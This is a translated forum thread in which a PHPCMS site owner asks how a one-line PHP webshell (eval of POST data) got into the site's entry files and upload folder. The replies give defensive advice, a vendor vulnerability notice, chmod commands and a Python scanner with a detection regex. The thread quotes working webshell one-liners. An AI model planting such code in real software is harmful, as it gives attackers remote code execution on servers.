The website program has been invaded by a Trojan [<?php eval($_POST[1]);?> ok]. Please help find out the mechanism?
伊谢尔伦 2017-06-26 10:48:58

The website has been attacked by hackers frequently recently, and we are asking PHP experts for help in clarifying our thinking, so that we can find the loopholes as soon as possible and put our worries to rest!

The incident is now described as follows:

1. The website is built using the default version of PHPCMS_V9_5.20.

2. All files are initially stored in the server root directory with fully open permissions.

3. Later, the website was hacked and the entry files api.php and index.php were rewritten.

4. The virus file implanted is a "one-sentence Trojan". Its content is as follows:

<?php @eval($_POST['dcs-19']);?>
<?php

5. After finding the problem and deleting it, I locked the permissions of such files, thinking that this would solve the problem. However, a few days later, I found that the website's search-engine snapshot had been hijacked, so I checked and killed the Trojan again. This time the Trojan file was located in the uploadfile/20170527 folder in the root directory of the server. This folder is generated automatically, named by date, when attachments are uploaded or articles are updated in the backend. However, no article was updated on May 27, yet the folder appeared. I am asking the experts for help investigating the root cause of the website's problem.

The content of the Trojan is:

<?php eval($_POST[1]);?>
ok

Addendum: After searching for related content on the Internet, most sources say it was a SQL injection attack caused by vulnerabilities in the website program and advise fixing the vulnerability, but how do I fix it? Is upgrading the PHP version online useful?

I'm a novice from a technical background, so I don't understand many things. If something is unclear, I'll follow your instructions and add it during the Q&A!


All replies (5)
学霸

The principle of this one-sentence code is very simple: POST refers to the data sent by the client, and eval means executing that data as code.
For the hacker, it is enough to enter code in a dialog box on your web page, and after submission it is actually executed.

This is just a symptom, that is, the backdoor left behind at the end. But how did the hacker get in and leave the backdoor? There are too many possibilities: maybe there is a vulnerability in the upload function, the FTP password was cracked, administrator privileges were obtained, and so on. This Trojan is left at the end simply for convenience next time.

The minimum you need to do is to download the entire code base, go through all of the code, and find every eval-related place. If they are not necessary for the program, deal with them all. Otherwise, if you delete one here, they will upload another one elsewhere; it's endless. The second thing is to plug the system administration loopholes. Update server components wherever they can be updated. Change all passwords and use random strong passwords. Then install anti-virus software on the server; I remember using an open-source one on a Linux server before, but I forget the name, just search for it.

Finally, if that doesn't work, leave it to a professional and see whether the investment is worth it. I remember that there are foreign websites that provide Trojan removal and change-monitoring services. It seems to cost one or two hundred dollars a year, which is quite expensive. I don't know whether there is the same service in China.

阿神

Notice about PHPCMS vulnerability
Dear users:
Hello!
The latest vulnerability exposed in the PHPCMS program in April this year allows PHP Trojan files to be injected into the website by modifying the member registration parameters. Through our company's testing, we found that when a member registers, PHPCMS encrypts the registration information and then passes it to the server for member registration. Since the encryption method cannot be cracked for the time being, our company cannot intercept hacker intrusions by matching the corresponding keywords.
There are currently three solutions:

1. Upgrade to the latest PHPCMS program;

2. Close the member registration function on the website;

3. Cancel the execution permission of the uploadfile directory (this method can prevent Trojan execution, but cannot prevent Trojan file upload).

After carrying out any of the above solutions, please thoroughly check the uploadfile directory and its subdirectories for PHP files. This directory is where uploaded pictures are saved; if a PHP file is found there, it must be a Trojan file. Please delete it promptly!

Jingan Network
2017.6.19
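As an added example (not the asker's, any replier's, or PHPCMS's code), the following Python automates the two checks suggested above: 学霸's advice to find every eval-related place in the code, and the notice's advice to check uploadfile for PHP files. It builds a constructed temporary tree holding the two payloads quoted in the question; the list of PHP extensions and the extension to $_GET/$_REQUEST/$_COOKIE beyond the thread's $_POST are assumptions.

```python
# Added defensive scanner, not PHPCMS or any replier's code. It automates the two checks suggested
# in this thread ("find all eval-related places", "check uploadfile for PHP files") on a constructed
# temp tree holding the two payloads quoted in the question.
import os
import re
import shutil
import tempfile

# Extensions a typical Apache/PHP setup hands to the interpreter (assumption about the server).
PHP_EXTENSIONS = (".php", ".php3", ".php4", ".php5", ".php7", ".phtml", ".phar")
# eval( or @eval( fed straight from a request superglobal, e.g. $_POST[1] or $_POST['dcs-19'];
# generalized beyond the thread's $_POST to the other superglobals a one-sentence Trojan uses.
EVAL_WEBSHELL = re.compile(rb"@?\s*eval\s*\(\s*\$_(POST|GET|REQUEST|COOKIE)\s*\[", re.IGNORECASE)

def scan_tree(root: str, upload_dir: str) -> list[tuple[str, str]]:
    """Return sorted (relative path, reason) pairs for every suspicious file under root."""
    upload_prefix = os.path.join(root, upload_dir) + os.sep
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root)
            # Rule 1: the upload directory should hold only images; any PHP file there is a Trojan.
            if path.startswith(upload_prefix) and name.lower().endswith(PHP_EXTENSIONS):
                findings.append((rel, "php file inside upload directory"))
            # Rule 2: eval() of request data anywhere in the code base, whatever the extension.
            with open(path, "rb") as fh:
                head = fh.read(1 << 20)  # first MiB covers one-liners appended to real files
            if EVAL_WEBSHELL.search(head):
                findings.append((rel, "eval() of request data"))
    return sorted(findings)

def demo() -> list[tuple[str, str]]:
    """Build a constructed PHPCMS-like tree with the thread's two payloads and scan it."""
    root = tempfile.mkdtemp()
    samples = {
        "index.php": b"<?php echo 'clean entry file'; ?>\n",
        "api.php": b"<?php @eval($_POST['dcs-19']);?>\n",               # rewritten entry file
        "uploadfile/20170527/a.php": b"<?php eval($_POST[1]);?>\nok\n",  # Trojan in dated folder
        "uploadfile/20170527/photo.jpg": b"\xff\xd8\xff\xe0 constructed jpeg bytes",
    }
    try:
        for rel, content in samples.items():
            os.makedirs(os.path.dirname(os.path.join(root, rel)), exist_ok=True)
            with open(os.path.join(root, rel), "wb") as fh:
                fh.write(content)
        return scan_tree(root, "uploadfile")
    finally:
        shutil.rmtree(root)
```

Run against a real site, point scan_tree at the web root and the real upload directory name; a .php file under uploadfile is reported even when it contains no eval, since the notice treats any PHP file there as a Trojan.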

给我你的怀抱

Change the server password, change the SSH default port, and move to another server. Also move away from PHPCMS, which stopped updating 5 or 6 years ago; it definitely has a lot of loopholes.

typecho

Permission issue: your upload directory has executable permissions.
The solution is to eliminate PHPCMS's vulnerabilities and to remove the executable permission from the directories of all external files (code not written by you or the framework).

find upload -type d -exec chmod 755 {} +   # directories keep x (traverse), otherwise they cannot be opened
find upload -type f -exec chmod 644 {} +   # files lose x; nothing under upload should be executable
滿天的星座

To the two replies above ("your upload directory has executable permissions enabled", "cancel the execution permissions of the uploadfile directory"):
What does this mean? Once the directory's execution permission is cancelled, the directory cannot be opened, and even when I want to upload pictures, I cannot upload them. Is that still acceptable?
